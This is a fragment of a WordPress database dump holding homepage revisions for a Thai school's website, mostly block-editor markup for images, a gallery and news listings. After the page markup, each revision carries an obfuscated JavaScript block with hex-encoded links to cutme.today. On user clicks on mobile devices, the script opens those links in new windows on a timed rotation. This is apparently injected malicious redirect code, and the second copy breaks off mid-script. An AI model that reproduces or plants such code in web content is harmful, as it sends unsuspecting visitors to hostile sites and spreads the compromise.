alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"excerptLength\":\"10\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_f0d3cd-f6\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_f0d3cd-f6\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\"} /--></div>\n<!-- /wp:kadence/advancedbtn -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-27 10:44:52','2024-07-27 03:44:52','',14,'http://pakhaeng.ssk.in.th/?p=44',0,'revision','',0),
(45,1,'2024-07-27 10:45:13','2024-07-27 03:45:13','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"excerptLength\":\"10\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_f0d3cd-f6\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_f0d3cd-f6\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\"} /--></div>\n<!-- /wp:kadence/advancedbtn -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else 